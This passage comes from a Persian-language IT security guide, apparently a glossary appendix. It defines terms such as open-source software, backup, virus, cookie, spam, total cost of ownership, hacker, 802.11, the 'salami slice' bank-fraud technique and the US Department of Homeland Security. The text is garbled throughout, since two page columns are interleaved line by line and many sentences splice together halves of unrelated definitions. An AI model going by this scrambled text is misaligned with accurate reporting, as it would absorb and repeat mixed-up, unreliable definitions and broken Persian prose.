ﺩﺳﺘﺮﺳﻲ ﻣﻮﻓﻖ ،ﻗﺎﺑﻞ ﺗﻜﺮﺍﺭ ،ﻭ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺣﻔﺎﻇﺖﺷـﺪﺓ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦﺑـﺎﺯ ﻏﺎﻟﺒـﹰﺎ ﺳـﺎﻳﺮ ﺑﺮﻧﺎﻣـﻪﻧﻮﻳـﺴﺎﻥ ﺭﺍ
ﺳﻴﺴﺘﻢ. ﺑﺮﺍﻱ ﻣﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳﻌﻪﻫﺎﻱ ﺑﻌﺪﻱ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﺸﻮﻳﻖ ﻣﻲﻛﻨﻨﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﻫﻤﭽﻨﻴﻦ ﺷﺎﻣﻞ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻫﺴﺘﻨﺪ ﻛـﻪ
٤٧١
ﻧﻘﻄﺔ ﺗﻤﺎﺱ )(POC ﺑﻄﻮﺭ ﺭﺍﻳﮕﺎﻥ ﻋﺮﺿﻪ ﻣﻲﺷﻮﻧﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦﺑـﺎﺯ
ﺷﺨﺺ ﻳﺎ ﺍﺷﺨﺎﺻﻲ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻳﺎ ﺭﺍﻫﺒﺮﺍﻥ ﺳﻴﺴﺘﻢ ﺑﻼﻓﺎﺻـﻠﻪ -ﭼﻪ ﻓﺮﻭﺷﻲ ﻭ ﭼـﻪ ﺭﺍﻳﮕـﺎﻥ -ﻗﺎﺑﻠﻴﺘﻬـﺎﻳﻲ ﺩﺍﺭﻧـﺪ ﻛـﻪ ﺷـﺒﻴﻪ
ﺑﺎﻳﺪ ﮔﺰﺍﺭﺵ ﺭﺧﻨﻪﻫﺎ ﻳﺎ ﻣﻮﺍﺭﺩ ﻣﺸﻜﻮﻙ ﺭﺍ ﺑﻪ ﺁﻧﻬﺎ ﺑﺪﻫﻨﺪ .ﻧﻘﻄـﺔ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺰﻳﻨـﺔ ﺍﻧـﺪﻛﻲ ﻧﻴـﺰ
ﺍﺗﺼﺎﻝ ﻣﻌﺎﺩﻝ ﺧﻂ ﺍﻇﻄـﺮﺍﺭﻱ ۹۱۱ﺩﺭ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺍﻃﻼﻋـﺎﺗﻲ ﺩﺍﺷــﺘﻪ ﺑﺎﺷــﻨﺪ .ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ
ﺍﺳﺖ. ﻣﻮﺍﻓﻘﺘﻨﺎﻣــﻪﻫــﺎﻱ ﻣﺨــﺼﻮﺻﻲ ﺩﺭ ﻗــﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ
٤٧٢ ﺍﻧﺤﺼﺎﺭﻱ ﺑﻜﺎﺭ ﻣﻲﺭﻭﻧﺪ .ﺑﺮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ
ﻧﮕﻬﺪﺍﺭﻱ ﺍﺯ ﺛﺒﺘﻬﺎ
ﭘﺎﻳﺎﮔﺎﻫﻬــﺎﻱ www.opensource.orgﻭ www.fsf.org
ﺍﻳﻨﻜﻪ ﭼﻪ ﻣﺪﺕﺯﻣﺎﻧﻲ ﺍﺯ ﺛﺒﺘﻬﺎ ﻧﮕﻬﺪﺍﺭﻱ ﻭ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺧﻮﺍﻫﺪ ﺷﺪ.
ﺭﺟﻮﻉ ﻛﻨﻴﺪ.
٤٧٣
ﻭﺍﺳﻂ ﻛﺎﺭﺑﺮﻱ ٤٦٧
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ
ﺁﻥ ﻗﺴﻤﺖ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻛﺎﺭﺑﺮﺩﻱ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﺎ ﺁﻥ
ﺭﻭﻧﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ ﺩﻳﮕﺮ ﺭﻭﻱ
ﺳﺮ ﻭ ﻛﺎﺭ ﺩﺍﺭﻧﺪ .ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺑـﺼﻮﺭﺕ ﻣﺘﻨـﻲ
ﺭﺍﻳﺎﻧﻪ ﻭ ﻳﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺫﺧﻴﺮﻩﺳـﺎﺯﻱ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ
ﺑﺎﺷﻨﺪ ،ﻣﺜﻞ ﺁﻧﭽﻪ ﺩﺭ DOSﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﻭ ﻳﺎ ﮔﺮﺍﻓﻴﻜـﻲ ﺑﺎﺷـﻨﺪ،
ﻣﺠﺰﺍ ﺑﺎﺷﻨﺪ .ﻧﺴﺨﻪﻫﺎﻱ ﭘﺸﺘﻴﺒﺎﻥ ﺷﻤﺎ ﺭﺍ ﻗﺎﺩﺭ ﻣﻲﻛﻨﻨـﺪ ﻫﻨﮕـﺎﻡ
ﻣﺜﻞ ﻭﺍﺳﻄﻬﺎﻱ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺟﻮﺩ ﺩﺭ .Microsoft Windows
ﺧﺮﺍﺑﻲ ﻧﺴﺨﻪﻫﺎﻱ ﺍﺻﻠﻲ ﺑﺪﻻﻳﻞ ﻣﺨﺘﻠﻒ)ﺍﺯ ﺣﺬﻑ ﺗﺼﺎﺩﻓﻲ ﺩﺍﺩﻩﻫـﺎ
ﮔﺮﻓﺘﻪ ﺗﺎ ﺁﺳﻴﺐ ﻓﻴﺰﻳﻜﻲ ﻭ ﻳﺎ ﺩﺯﺩﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ( ،ﻫﻤﭽﻨﺎﻥ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎ
ﺭﺍ ﺑﺎﺯﻳﺎﺑﻲ ﻧﻤﺎﻳﻴﺪ.
468 Token
469 Virus Signature
470 Penetration 464 Fault Tolerant
471 Point of Contact 465 Username / Password
472 Log Retention 466 Open-Source Software
473 User Interface 467 Backup
٤٦٥ ﭘﻴﻮﺳﺘﻬﺎ
٤٧٤
ﺩﺭ ﻣﻮﺭﺩ IEEEﻭ ﺟﺎﻣﻌﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺁﻥ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻫﻬـﺎﻱ ﻭﻳﺮﻭﺱ
ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ: ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﺍﻱ ﻛﻪ ﺩﺍﺧﻞ ﻳﻚ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﺎﺳﺎﺯﻱ ﻣﻲﺷﻮﺩ.
ﺯﻣﺎﻧﻴﻜﻪ ﺑﺮﻧﺎﻣﻪ ﺑﻪ ﺍﺟﺮﺍ ﺩﺭ ﺁﻳﺪ ،ﻗﻄﻌـﻪﺑﺮﻧﺎﻣـﺔ ﺁﻟـﻮﺩﻩ ﻫـﻢ ﻓﻌـﺎﻝ
http://standard.ieee.org
http://www.computer.org ﻣﻲﺷﻮﺩ .ﻫﻤﻴﻨﻜﻪ ﻳﻚ ﻭﻳﺮﻭﺱ ﻓﻌﺎﻝ ﺷﺪ ،ﺧﻮﺍﻫﺪ ﺗﻮﺍﻧﺴﺖ ﺧـﻮﺩ
ﺭﺍ ﺗﻜﺜﻴﺮ ﻛﻨﺪ ،ﭘﻴﺎﻡ ﺑﻔﺮﺳﺘﺪ ،ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺗﺨﺮﻳـﺐ ﻛﻨـﺪ ،ﻭ ﻛـﺎﺭﺁﻳﻲ
Cookie
ﺳﻴﺴﺘﻢ ﺭﺍ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻭﺭﺩ.
ﻳﻚ ﻓﺎﻳـﻞ ﻛـﻪ ﺑـﻪ ﺩﺭﺧﻮﺍﺳـﺖ ﻳـﻚ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺭﺍﻩ ﺩﻭﺭ ﺭﻭﻱ
ﺩﻳﺴﻚ ﺳـﺨﺖ ﺭﺍﻳﺎﻧـﺔ ﺷـﻤﺎ ﻧﻮﺷـﺘﻪ ﻭ ﻳـﺎ ﺍﺯ ﺭﻭﻱ ﺁﻥ ﺧﻮﺍﻧـﺪﻩ ٤٧٥
ﻫﺮﺯﻧﺎﻣﻪ
ﻣﻲﺷﻮﺩ .ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺩﺭﺧﻮﺍﺳﺖ ﻣﻲﻛﻨﺪ ﻛﻪ ﻓﺎﻳﻞ ﻧﻮﺷﺘﻪ ﺷـﻮﺩ ﻭ
ﻋﺒــﺎﺭﺕ ﺍﺳــﺖ ﺍﺯ ﻧﺎﻣــﻪﻫــﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜــﻲ ﺩﺭﺧﻮﺍﺳــﺖﻧــﺸﺪﻩ،
ﻼ ﺍﮔـﺮ ﺑـﻪ
ﺩﺭ ﺩﻓﻌﺎﺕ ﺑﻌﺪ ﻣﺠﺪﺩﹰﺍ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻧﺮﺍ ﻣـﻲﺧﻮﺍﻧـﺪ .ﻣـﺜ ﹰ
ﻧﺎﺧﻮﺍﺳﺘﻪ ،ﻧﺎﻣﺮﺑﻮﻁ ،ﻭ ﻳﺎ ﻧﺎﻣﻨﺎﺳﺐ ؛ ﺧﺼﻮﺻﹰﺎ ﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﻭ
ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺧﻮﺩ ﺑﺪﻫﻴﺪ ،ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭﺧﻮﺍﺳﺖ ﻛﻨﺪ ﻛﻪ
ﺗﺒﻠﻴﻐﺎﺗﻲ ﺩﺭ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩ ﺍﺳﺖ.
ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﻭﻱ ﺩﻳﺴﻚ ﺷﻤﺎ ﻧﻮﺷﺘﻪ ﺷﻮﺩ .ﺯﻣﺎﻧﻴﻜﻪ ﺩﻭﺑﺎﺭﻩ ﺑـﻪ
ﺁﻥ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻣﺮﺍﺟﻌﻪ ﻣﻲﻛﻨﻴﺪ ،ﺁﻥ ﭘﺎﻳﮕﺎﻩ cookieﻣﺮﺑﻮﻃﻪ ﺭﺍ ٤٧٦
ﻫﺰﻳﻨﺔ ﻛﻞ ﻣﺎﻟﻜﻴﺖ )(TCO
ﺍﺯ ﺭﻭﻱ ﺩﻳﺴﻚ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﻣﻲﺧﻮﺍﻧﺪ ﻭ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛـﻪ ﻧـﺎﻡ ﻣﺪﻟﻲ ﻛﻪ ﺑﻪ ﻣﺘﺨﺼـﺼﺎﻥ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺩﺭ ﺩﺭﻙ ﻭ ﺍﺩﺍﺭﺓ
ﻛﺎﺭﺑﺮﻱ ﺷﻤﺎ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖCookie .ﻫﺎ ﺑﺮﺍﻱ ﺗﻬﻴﺔ ﺳـﺎﺑﻘﻪﺍﻱ ﻫﺰﻳﻨﻪﻫﺎﻱ ﻣﺴﺘﻘﻴﻢ ﻭ ﻏﻴﺮﻣﺴﺘﻘﻴﻤﻲ ﻛﻪ ﺑﺎ ﻛﺴﺐ ،ﻧﮕﻬـﺪﺍﺭﻱ ،ﻭ
ﺍﺯ ﻋﺎﺩﺗﻬﺎﻱ ﮔﺮﺩﺵ ﺩﺭ ﻭﺏ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺩﺭ ﺑﻌـﻀﻲ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺳﻴﺴﺘﻢ ﻛﺎﺭﺑﺮﺩﻱ ﻳﺎ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑـﻪ ﺑـﺎﺭ ﻣـﻲﺁﻳـﺪ
ﻣﻮﺍﺭﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺣﺮﻳﻢ ﺧﺼﻮﺻﻲ ﻛﺎﺭﺑﺮﺍﻥ ﺭﺍ ﻧﻘﺾ ﻛﻨﻨﺪ. ﻻ ﺷـﺎﻣﻞ ﻫﺰﻳﻨـﻪﻫـﺎﻱ ﺁﻣـﻮﺯﺵ، ﻛﻤﻚ ﻣﻲﻛﻨﺪ TCO .ﻣﻌﻤـﻮ ﹰ
٤٨٠
ﺍﺭﺗﻘﺎﻫﺎ ،ﻭ ﻫﻤﭽﻨﻴﻦ ﻫﺰﻳﻨﺔ ﺍﺻﻠﻲ ﺳﻔﺎﺭﺵ ﺍﻭﻟﻴﻪ ﻧﻴﺰ ﻣﻲﺷﻮﺩ.
IETF
ﻳﻚ ﺍﻧﺠﻤـﻦ ﻋﻤـﻮﻣﻲ ﻛـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎ ﺭﺍ ﺗـﺪﻭﻳﻦ ﻣـﻲﻛﻨـﺪ ﻭ ٤٧٧
ﻳﻜﭙﺎﺭﭼﮕﻲ ﻭ ﺻﺤﺖ ﺩﺍﺩﻩﻫﺎ
ﻧﮕﺮﺍﻧﻴﻬﺎﻱ ﺭﻭﺯﻣﺮﺓ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺭﻓﻊ ﻣﻲﻧﻤﺎﻳﺪ. ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ ﺩﺍﺩﻩﻫﺎﻱ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﻣﻌـﺮﺽ ﺗﻐﻴﻴـﺮ ﻳـﺎ
ﺗﺨﺮﻳﺐ ﺗﺼﺎﺩﻓﻲ ﻳـﺎ ﺗﻌﻤـﺪﻱ )ﺩﺭﻧﺘﻴﺠـﺔ ﺍﻋﻤـﺎﻝ ﺧﺮﺍﺑﻜﺎﺭﺍﻧـﻪ( ﻗـﺮﺍﺭ
Hack
ﺩﺭ ﻛﻞ ﺑﻪ ﻣﻌﻨﺎﻱ ﻧﻮﺷﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺍﺳـﺖ؛ ﺍﻣـﺎ ﺩﺭ ﻣﺘـﻮﻥ ﻧﮕﺮﻓﺘﻪ ﺍﺳﺖ.
ﻻ ﺑﺮﺍﻱ ﺑﻬﺮﻩﺑﺮﺩﺍﺭﻱ ﺍﺯ ﺁﺳـﻴﺐﭘـﺬﻳﺮﻳﻬﺎﻱ ﺳﻴـﺴﺘﻢ ﺍﻣﻨﻴﺘﻲ ﻣﻌﻤﻮ ﹰ 802.11
ﺟﻬﺖ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﻣﻨﺎﺑﻊ ﺳﻴﺴﺘﻤﻲ ﺑﻜﺎﺭ ﻣﻲﺭﻭﺩ. ﻣﺆﺳﺴﻪ 802.11ﻣﺠﻤﻮﻋﻪﺍﻱ ﺍﺯ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﺔ
ﻣﻬﻨﺪﺳـﺎﻥ ﺑـﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴـﻚ ) ٤٧٨(IEEEﺑـﺮﺍﻱ ﺷـﺒﻜﻪﻫــﺎﻱ
Hacker
ﺷﺨﺼﻲ ﻛﻪ ﻋﻼﻗﻤﻨﺪ ﺑﻪ ﺭﺍﻳﺎﻧﻪ ﺍﺳﺖ ﻭ ﺍﺯ ﻛﺴﺐ ﺗﺠﺮﺑـﻪ ﺑـﺎ ﺁﻥ ﺑﻲ ﺳﻴﻢ ﻣﺤﻠﻲ ) ٤٧٩(WLANsﺍﺳﺖ IEEE .ﺳﺎﺯﻣﺎﻧﻲ ﺍﺳﺖ ﻛـﻪ
ﻟﺬﺕ ﻣﻲﺑﺮﺩ .ﺍﻳﻦ ﻭﺍﮊﻩ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﻛﺴﻲ ﻛﻪ ﺑﺎ ﻗﺼﺪ ﺑـﺪ ﺍﻗـﺪﺍﻡ ﺩﺭ ﺑﺨﺸﻬﺎﻱ ﻣﺨﺘﻠﻒ ﺣﻮﺯﺓ ﺑﺮﻕ ﻭ ﺍﻟﻜﺘﺮﻭﻧﻴﻚ ﺍﺳﺘﺎﻧﺪﺍﺭﺩ ﺗﺪﻭﻳﻦ
ﺑﻪ ﺟﻤﻊﺁﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻧﻘﺎﻳﺺ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪ ﻣﻲﻛﻨـﺪ ﻭ ﺑـﺪﻭﻥ ﻻ ﺗﺒـﺪﻳﻞ ﺑـﻪ ﺍﺳـﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ
ﻣﻲﻛﻨﺪ ﻭ ﺍﺳﺘﺎﻧﺪﺍﺭﺩﻫﺎﻱ ﺁﻥ ﻣﻌﻤﻮ ﹰ
ﻣﺠﻮﺯ ﺻﺎﺣﺐ ﺳﻴﺴﺘﻢ ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺷﻮﺩ ﻧﻴﺰ ﺍﻃـﻼﻕ ﻣـﻲﮔـﺮﺩﺩ. ﻣﻠﻲ ﻭ ﺑﻴﻦ ﺍﻟﻤﻠﻠﻲ ﻣﻲﺷﻮﻧﺪ .ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺗﻌﺪﺍﺩﻱ ﻣﺠﻠﻪ ﻣﻨﺘـﺸﺮ
ﻭﺍﮊﺓ "ﻗﻔﻞﺷﻜﻦ" ﺑﺮﺍﻱ ﻣﻌﻨﺎﻱ ﺻﺮﻓﹰﺎ ﻣﻨﻔﻲ ﺍﻳﻦ ﻋﺒﺎﺭﺕ ﻣﻨﺎﺳـﺒﺘﺮ ﻣﻲﻛﻨﺪ ،ﺷﺎﺧﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺯﻳﺎﺩﻱ ﺩﺭ ﻗـﺴﻤﺘﻬﺎﻱ ﻣﺨﺘﻠـﻒ ﺩﻧﻴـﺎ
ﺍﺳﺖ) .ﺑﻪ ﺗﻮﺿﻴﺤﺎﺕ ﻭﺍﮊﺓ ﻗﻔﻞﺷﻜﻦ ﻣﺮﺍﺟﻌﻪ ﻛﻨﻴﺪ(. ﺩﺍﺭﺩ ،ﻭ ﺩﺍﺭﺍﻱ ﺟﻮﺍﻣﻊ ﺑﺰﺭﮒ ﺑﺴﻴﺎﺭﻱ ﺩﺭ ﻣﺤﺪﻭﺩﻩﻫﺎﻱ ﺗﺨﺼﺼﻲ
ﺑﺨﺶ ﺷﺸﻢ
Salami Slice
ﻳﻚ ﺭﻭﺵ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺮﺍﻱ ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﺳﺮﻣﺎﻳﻪ .ﺩﺭ ﺍﻳﻦ
ﺭﻭﺵ ﻳﻚ ﭘﺎﻳﮕﺎﻩ ﺩﺍﺩﺓ ﺣﺴﺎﺑﻬﺎﻱ ﺑـﺎﻧﻜﻲ ﺗـﺴﺨﻴﺮ ﻣـﻲﺷـﻮﺩ ،ﻭ
ﺳﭙﺲ ﻣﺒﻠﻎ ﻧﺎﭼﻴﺰﻱ ﺍﺯ ﻫﺮ ﺣﺴﺎﺏ ﺍﻋﺘﺒﺎﺭ ﻛﻢ ﻣﻲﮔﺮﺩﺩ ﺗﺎ ﭼﻴﺰﻱ
ﻣﺸﻜﻮﻙ ﺑﻨﻈﺮ ﻧﻴﺎﻳﺪ ،ﻭ ﻣﺠﻤﻮﻉ ﺍﻋﺘﺒﺎﺭﺍﺕ ﻛﺎﺳﺘﻪﺷﺪﻩ ﻫﻤﮕﻲ ﺑﻪ
ﻳﻚ ﺣﺴﺎﺏ ﺧﺎﺹ ﻭﺍﺭﻳﺰ ﻣﻲﺷﻮﻧﺪ.
٤٨٢
URL
ﻼ:
ﻳﻚ ﺁﺩﺭﺱ ﻛﻠﻲ ﺑﺮﺍﻱ ﺗﻌﻴﻴﻦ ﻣﺤﻞ ﭼﻴﺰﻱ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ .ﻣﺜ ﹰ
http://www.infodev.org
mailto:infodev@worldbank.org
485 Organization for Economic Cooperation and 483 Digital Opportunity Task Force
Development 484 Louder Voices Study
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ٤٦٨
ﻣﻲﺩﻫﺪ ،ﻭ ﺑﻬﺘﺮﻳﻦ ﺭﻭﺷﻬﺎ ﺑﺮﺍﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ ﻣﺤﺮﻣـﺎﻧﮕﻲ - ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺍﺳﺖ .ﺍﻭﻟﻮﻳﺖ ﺍﻭﻝ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺟﺪﻳﺪ ،ﺣﻔﺎﻇـﺖ
ﺑﮕﻮﻧﻪﺍﻱ ﻛﻪ ﻛﺴﺐ ﻭ ﻛﺎﺭ ﺑﺘﻮﺍﻧـﺪ ﻋﻤﻠﻜـﺮﺩ ﻣـﺆﺛﺮﻱ ﺩﺍﺷـﺘﻪ ﺍﺯ ﻣﻠﺖ ﺩﺭ ﺑﺮﺍﺑﺮ ﺣﻤﻼﺕ ﺗﺮﻭﺭﻳﺴﺘﻲ ﺍﺳﺖ .ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺟﺰﺋﻲﺗـﺮ
ﺑﺎﺷﺪ ﻭ ﺑﻪ ﻧﻮﺁﻭﺭﻱ ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﺪ -ﺭﺍ ﭘﻴﺸﻨﻬﺎﺩ ﻣﻲﻧﻤﺎﻳﺪ. ﺗﻬﺪﻳﺪﻫﺎ ﻭ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺟﺎﺳﻮﺳﻲ ﺭﺍ ﺗﺤﻠﻴﻞ ﻣﻲﻛﻨﻨﺪ ،ﺍﺯ ﻣﺮﺯﻫـﺎ ﻭ
ﻓﺮﻭﺩﮔﺎﻫﻬﺎﻱ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺩﻓﺎﻉ ﻣﻲﻧﻤﺎﻳﻨﺪ ،ﺯﻳﺮﺑﻨﺎﻫﺎﻱ ﺣﻴﺎﺗﻲ
ﭖ( ﻃﺮﺡ ﺗﺒﻴﻴﻦ ﺳﻴﺎﺳﺖ ICCﺩﺭ ﻣﻮﺭﺩ ﻣﺤﺮﻣﺎﻧﮕﻲ ﻛﺎﺭﻣﻨـﺪﺍﻥ، ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ ﺭﺍ ﻣﻮﺭﺩ ﻣﺤﺎﻓﻈﺖ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨـﺪ ،ﻭ ﻭﺍﻛﻨـﺸﻬﺎﻱ
ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ،ﻭ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ -ﺍﻳﻦ ﻃﺮﺡ ﻣﻮﻗﻌﻴﺖ ICC ﻛﺸﻮﺭ ﺭﺍ ﺑﺮﺍﻱ ﺷﺮﺍﻳﻂ ﺍﺿﻄﺮﺍﺭﻱ ﺩﺭ ﺁﻳﻨـﺪﻩ ﻣـﺪﻭﻥ ﻣـﻲﺳـﺎﺯﻧﺪ.
ﺭﺍ ﺩﺭ ﻣﺴﺎﺋﻞ ﻛﻠﻴﺪﻱ ﺣﻔﺎﻇﺖ ﺩﺍﺩﻩﻫﺎ ﻭ ﻣﻨﺎﺑﻊﺍﻧﺴﺎﻧﻲ ﺭﻭﺷـﻦ DHSﻫﻤﭽﻨﻴﻦ ﺑﺎ ﺗﺄﺳﻴﺲ ﺍﺩﺍﺭﺍﺕ ﻣﺨﺘﻠﻒ ،ﻣﺴﺌﻮﻟﻴﺖ ﺣﻔﺎﻇﺖ
ﻣﻲﻛﻨﺪ ﻭ ﺗﻮﺻﻴﻪﻫـﺎﻳﻲ ﺑـﺮﺍﻱ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﺩﻭﻟﺘـﻲ ﺩﺭ ﺍﻳـﻦ ﺍﺯ ﺣﻘـــﻮﻕ ﺷﻬــــﺮﻭﻧﺪﻱ ﺷــﻬﺮﻭﻧﺪﺍﻥ ﺁﻣـــﺮﻳﻜﺎﻳﻲ ﻭ ﺑﻬﺒــﻮﺩ
ﺯﻣﻴﻨﻪ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ. ﺧـﺪﻣﺎﺕ ﻋﻤﻮﻣﻲ ﭼـﻮﻥ ﻛﻤـﻚﺭﺳﺎﻧﻲ ﻫﻨﮕﺎﻡ ﻭﻗــﻮﻉ ﺣـﻮﺍﺩﺙ
ﻃﺒﻴﻌﻲ ﻭ ﺍﺭﺍﺋﻪ ﺧﺪﻣﺎﺕ ﺷﻬـﺮﻭﻧـﺪﻱ ﺭﺍ ﻧﻴﺰ ﺑﺮ ﻋﻬﺪﻩ ﺩﺍﺭﺩ .ﺑـﺮﺍﻱ
ﺕ( ﻃﺮﺡ ﻣﻔﺎﻫﻴﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ - ٤٩٦ﻃﺮﺡ ﻣﻔـﺎﻫﻴﻢ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻪ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﺍﻳﻦ ﺳﺎﺯﻣﺎﻥ ﺩﺭ ﺁﺩﺭﺱ
ﺳﺎﻝ ،۲۰۰۴ﺍﺑﺰﺍﺭ ﻗﺎﻧﻮﻧﻲ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺿـﺎﺑﻄﺔ ﺧـﻮﺩ ﺁﻥ ﺩﺭ
www.dhs.govﻣﺮﺍﺟﻌـﻪ ﻛﻨﻴﺪ.
ﻗﺮﺍﺭﺩﺍﺩﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ .ﺍﻳـﻦ ﻣـﺴﺘﻨﺪ ﺗﻮﺳـﻂ ﻳـﻚ
ﮔﺮﻭﻩ ﻃﺮﺡﺭﻳﺰ ﻏﻴﺮﺭﺳﻤﻲ ﺗﻬﻴﻪ ﺷﺪﻩ ﺍﺳﺖ .ﺩﺭ ﻗﺎﻟﺐ ﻓﻌﻠـﻲ، ﺳــﺎﺯﻣﺎﻥ FBIﺑﺘــﺎﺯﮔﻲ ﻧﺘــﺎﻳﺞ ﻳــﻚ ﺗﺤﻘﻴــﻖ ﺩﺭ ﻣــﻮﺭﺩ ﺟــﺮﺍﺋﻢ
